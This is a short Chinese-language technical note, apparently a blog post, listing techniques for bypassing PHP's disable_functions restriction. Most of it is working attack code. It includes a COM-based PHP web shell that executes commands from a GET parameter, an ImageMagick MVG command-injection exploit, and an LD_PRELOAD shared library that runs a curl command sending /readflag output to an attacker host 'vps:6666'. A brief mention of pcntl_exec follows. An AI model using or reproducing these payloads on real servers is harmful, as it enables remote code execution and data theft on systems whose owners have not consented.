几种绕过php disable_function限制的方式
1.window com组件
仅windows下适用,主要是php5.4,其他版本需要自己添加
php.ini配置
extension=php_com_dotnet.dll
1
2
3
4
5
6
7
8
| <?php
$command=$_GET['a'];
$wsh = new COM('WScript.shell'); // 生成一个COM对象 Shell.Application也能
$exec = $wsh->exec("cmd /c ".$command); //调用对象方法来执行命令
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
|
彻底的解决方案是 直接删除System32目录下wshom.ocx文件
2.利用ImageMagick漏洞绕过disable_function
phpinfo中显示相关配置信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| <?php
echo "Disable Functions: " . ini_get('disable_functions') . "\n";
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
$command = 'id';
}
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|$command")'
pop graphic-context
EOF;
file_put_contents("KKKK.mvg", $exploit);
$thumb = new Imagick();
$thumb->readImage('KKKK.mvg');
$thumb->writeImage('KKKK.png');
$thumb->clear();
$thumb->destroy();
unlink("KKKK.mvg");
unlink("KKKK.png");
?>
|
3.利用环境变量LD_PRELOAD来绕过
1
2
3
4
5
6
7
8
| #define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
__attribute__ ((__constructor__)) void preload (void)
{
system("curl vps:6666/`/readflag`");
}
|
gcc a.c -fPIC -shared -o a.so
1
2
3
4
5
| <?php
putenv("LD_PRELOAD=/var/www/html/a.so");
mail("[email protected]","","","","");
//error_log('',1);
?>
|
4.pcntl_exec
版本要求:PHP 4 >= 4.2.0, PHP 5
https://blog.csdn.net/weixin_43999372/article/details/87925442